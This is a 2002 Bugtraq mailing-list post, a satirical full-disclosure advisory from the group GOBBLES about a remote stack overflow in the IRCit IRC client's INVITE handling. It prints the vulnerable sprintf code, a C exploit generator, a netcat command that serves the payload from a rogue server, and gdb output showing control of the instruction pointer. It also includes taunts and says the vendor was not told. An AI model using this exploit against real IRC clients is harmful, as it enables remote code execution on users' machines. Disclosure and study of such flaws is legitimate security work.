Home page logo
/

bugtraq logo Bugtraq mailing list archives

Remote Hole in IRC Client and Stuff
From: gobbles () hushmail com
Date: Wed, 12 Jun 2002 08:27:59 -0700


-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

GOBBLES (http://www.bugtraq.org)
================================

GOBBLES Security Labs (GSL) is currently the largest non-profit security
team in the world, with over 17 active members that are dedicated to
bringing cutting edge material to the public that other groups are too
afraid and/or selfish to do.  Unlike some groups, GSL is at least honest
about their intentions -- GSL members want fame and glory.  We're not
out to make friends (re: fat kid).

 ____________________
< GOBBLES LOVE ROUTE >
 --------------------
  \                                  ,+*^^*+___+++_
   \                           ,*^^^^              )
    \                       _+*                     ^**+_
     \                    +^       _ _++*+_+++_,         )
              _+^^*+_    (     ,+*^ ^          \+_        )
             {       )  (    ,(    ,_+--+--,      ^)      ^\
            { (@)    } f   ,(  ,+-^ __*_*_  ^^\_   ^\       )
           {:;-/    (_+*-+^^^^^+*+*<_ _++_)_    )    )      /
          ( /  (    (        ,___    ^*+_+* )   <    <      \
           U _/     )    *--<  ) ^\-----++__)   )    )       )
            (      )  _(^)^^))  )  )\^^^^^))^*+/    /       /
          (      /  (_))_^)) )  )  ))^^^^^))^^^)__/     +^^
         (     ,/    (^))^))  )  ) ))^^^^^^^))^^)       _)
          *+__+*       (_))^)  ) ) ))^^^^^^))^^^^^)____*^
          \             \_)^)_)) ))^^^^^^^^^^))^^^^)
           (_             ^\__^^^^^^^^^^^^))^^^^^^^)
             ^\___            ^\__^^^^^^))^^^^^^^^)\\
                  ^^^^^\uuu/^^\uuu/^^^^\^\^\^\^\^\^\^\
                     ___) >____) >___   ^\_\_\_\_\_\_\)
                    ^^^//\\_^^//\\_^       ^(\_\_\_\)
                      ^^^ ^^ ^^^ ^


ABOUT THIS RELEASE
==================

This is an emergency release.  Politics are involved.  Comic advisory
coming soon.  Thank you for understanding situation.


POTENTIAL REMOTE ROOT VULNERABILITY IN  IRCit IRC CLIENT (POSSIBLY MORE)
========================================================================

Everyone knows that comprimising an IRC client is the first step in
hacking a "secure" operating system developer's personal IRC shell
server.  Hence this leads to the first of few steps to gain root on such
a machine.

GOBBLES Security members have found an exploitable remote vulnerability
in the IRCit IRC Client, which can be downloaded from:
        http://www.asymmetrica.com/software/ircit/

IRCit is very dangerous software in all respects. As it claims to be IRC
client for Information Terrorists. Proceed with caution and extreme
prejudice. For details read rest of advisory hehehe ;PPppPPPP


SOFTWARE VERSIONS AFFECTED
==========================
. . . at least the Current version, turkey not going to waste he time
      and take look at old versions to post big long useless list of
      all vulnerable versions, and likewise not going to look for same
      bug occuring in clients and clients derived from this client, and
      clients derived from same client this one was derived from, this
      is task for Team Bugtraq (bugtraq () securityfocus com) and for Team
      Vuln-Dev (vuln-dev () securityfocus com) to do.  GOBBLES not going to
      waste he time, when there political agenda to be taken care of in
      this advisory.


MISCELLANEOUS ERRATA
====================

First, it was brought to the world's attention here that monkey.org had
been comprimised and dugsong distributions were backdoored [1].

Then, here [2] we see doug sniff talking about how his server was
comprimised, and he mentions a REMOTE CLIENT SIDE HOLE in a popular IRC
client Epic[3], which was used in the hack of his server (or crack, if
you have too much ego to admit to being comprimised by someone more
skilled than yourself, as the case seems to be).

We like to quote useless IETF drafts [4] and RFC's [5] in our advisories
and other publications to show off that we're smart and read a lot of
worthless papers, like real skilled geeks do.

After reading this, GOBBLES Security members did visit www.epicsol.org
and looked for information about this dastardly remote exploit that
aides in the remote root comprimise of an OpenBSD developers and self
proclaimed security expert's personal machine, and found no mention of a
vulnerability, including no mention of it in the CHANGELOG[6].

Members of GOBBLES Security then tried to contact doug sniff via email [7],
who ignored our inquries concerning the bug.

We then approached whitehat[8] w00w00 leader Shok[9] to see if he could
share any details on this w00w00-known 0day vulnerability in one of the
most popular IRC clients.  He also refused to even acknowledge us.

Members of GOBBLES Security then attempted to post to mailing lists,
such as bugtraq[10] and vulndev[11] concerning this quasi-known
vulnerability, and were disappointed to see that all our posts on the
matter were rejected.

We then proceeded to browse through our collection of DEAR DIARY notes
concerning vulnerabilities that we have discovered during various audits
that we have not yet had the time to write advisories for, to see if we
had any information on a remote hole in Epic.  It turns out, we've yet
to audit that client, but plan on it in the near future.

We did come across notes regarding a somewhat related hole, which was
written up into this very advisory that you are now reading.


TECHNICAL DETAILS
=================

GOBBLES-bugsquasher.c find following situation with full alert red flags
in IRCit serverr.c sourcecode:

...

STD_IRC_SERVER(sINVITE)

 {
  char *n,
       *h,
       *v;

 if (n=splitn(&from), !from)  from="* () *";
    if (v=splitw(&rest), ((rest)&&(*rest==':')))  rest++;

    if ((mt_ptr->c_ignore&IG_INVITE)==0)
     {
      char s[MAXHOSTLEN];

       FIXIT(from);
       sprintf (s, "%s!%s", n, from);
...

GOBBLES is not even going to comment on where he think problem is. Rogue
IRC server that allow bad clients can allow the hijacking of IRCit information
terrorist client by inviting he client to execute arbitrary code.

EXPLOIT
=======

To exploit GOBBLES use he #1 whitehat penetrator tool netcat:

$ echo ":x"'!'`./GOBBLES-invite 0xcafebabe`"@x INVITE you :#GOBBLES" | nc
- -l -p 6667

GOBBLES cut and paste he code especially for friend Al Huger:

/* GOBBLES-invite.c */

#include <stdio.h>

int
main(int argc, char **argv)
{
        char heh[175], *store;
        int i;

        if(argc == 1) exit(0);

        sscanf(argv[1], "%p", &store);
        memset(heh, 'x', sizeof(heh));
        *(long *)&heh[166] = (long)store;
        *(long *)&heh[170] = (long)store;
        heh[174] = '\0';

        fprintf(stdout, "%s", heh);
        exit(0);
}

When GOBBLES connect he IRCit client he notice following in resulting
coredump:

(gdb) info reg eip
eip            0xcafebabe       0xcafebabe
(gdb)

That mean GOBBLES now have remotely exploitable bug of EPIC proportions
in IRCit irc client for information terrorists.


VENDOR NOTIFICATION STATUS
==========================

GOBBLES in security for fame, not friends.  GOBBLES often criticized and
immature method of not contacting vendor/programmer team come into play
once more today, and this advisory sent out without any notification.
Please divert flames from /dev/null stuff and send them to
GOBBLES () hushmail com so we all can sit in #!GOBBLES on irc looking at
angry mails from critics calling us immature and stuff.


GREETZ
======

all of w00w00, all of monkey.org, friends from Summercon 2002 (When are
videos going to get put online of GOBBLES speech?!!? HURRY THIS
EMERGENCY!#) including everyone whose name that GOBBLES already forget,
especially nice people who buy dinner for GOBBLES, gweeds (thanks for
free redbull), sl0ppy for being ethical and reading our email (hehe we
love you anyway, GOBBLES still beat you in Greatest Hacks competition by
one place though!!!), twd for discussing future of GOBBLES Security in
relation to his ezine, and to girl who apologize profusely to naked
GOBBLES for laughing at him during speech, hehehe ;PPPPpppp

Speech notes and pornography will be available online very soon from
Summercon, hehe, "GOBBLES LOVE ROUTE" and stuff, right now GOBBLES
working on figuring out hosting issue to thwart wget-based ddos he
website already experience (advisory coming soon on this subject).

Double standards rule.


CLOSING
=======

Anyone who has pictures from Summercon 2002, please mail them to us
(GOBBLES () hushmail com), thanks!

Remember, full disclosure is good, especially if political vendeta can
be aired to the public in a w00w00 style hidden in such subtle manner as
within security advisory.

If you could provide the community with details concerning this socalled
"Remote Root" hole in Epic, please do not hesitate to do so!  Teasing
the academic/professional security community with rumors of exploits is
not an appropriate action for anyone who wants to call themselves a
whitehat!


[1] http://archives.neohapsis.com/archives/bugtraq/2002-05/0281.html
[2] http://archives.neohapsis.com/archives/bugtraq/2002-05/0285.html
[3] http://www.epicsol.org
[4] http://www.ietf.org/ids.by.wg/webdav.html
[5] http://www.rfc-editor.org/cgi-bin/rfcdoctype.pl?loc=RFC&letsgo=1459&type=ftp&file_format=txt
[6] http://www.epicsol.org/changelog.phtml
[7] dugsong () monkey org (doug sniff)
[8] http://archives.neohapsis.com/archives/vuln-dev/2002-q1/0672.html
[9] shok () dataforce net (Matt Conover))
[10] http://archives.neohapsis.com/archives/vuln-dev/
[11] http://archives.neohapsis.com/archives/bugtraq/





-----BEGIN PGP SIGNATURE-----
Version: Hush 2.1
Note: This signature can be verified at https://www.hushtools.com

wlwEARECABwFAj0HaMAVHGdvYmJsZXNAaHVzaG1haWwuY29tAAoJEBzRp5chmbAP9+4A
n3XI0qqEJoZURxozpAhF6uBQenmoAJ9D1bXamS844pgNzwSUM7wKIn7/1Q==
=5s6i
-----END PGP SIGNATURE-----


  By Date           By Thread  

Current thread:
  • Remote Hole in IRC Client and Stuff gobbles (Jun 12)
[ Nmap | Sec Tools | Mailing Lists | Site News | About/Contact | Advertising | Privacy ]
AlienVault